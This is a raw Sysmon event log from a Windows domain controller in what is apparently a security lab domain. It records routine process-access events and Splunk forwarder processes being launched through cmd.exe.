08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001577Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001576Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001575Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001574Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001573Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001572Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001571Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16B2-5F84-3C00-000000007F01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001570Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16B2-5F84-3B00-000000007F01}38283832C:\Windows\system32\cmd.exe{5D479F2C-16B2-5F84-3C00-000000007F01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001569Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16B2-5F84-3C00-000000007F01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{5D479F2C-16B2-5F84-3B00-000000007F01}3828C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001568Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.746{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B2-5F84-3B00-000000007F01}3828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001567Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.746{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001566Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.746{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001565Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.746{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001564Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.746{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001563Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.746{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001562Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.746{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001561Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.746{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001560Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.746{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001559Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.746{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001558Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.746{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16B2-5F84-3B00-000000007F01}3828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001557Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.746{5D479F2C-16B1-5F84-3000-000000007F01}26163792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16B2-5F84-3B00-000000007F01}3828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7d48|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001556Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.757{5D479F2C-16B2-5F84-3B00-000000007F01}3828C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001555Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.746{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001554Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.746{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16B2-5F84-3A00-000000007F01}3796C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001553Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.746{5D479F2C-169F-5F84-0A00-000000007F01}856948C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001552Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.730{5D479F2C-16B2-5F84-3800-000000007F01}37363756C:\Windows\system32\conhost.exe{5D479F2C-16B2-5F84-3900-000000007F01}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001551Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.730{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001550Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 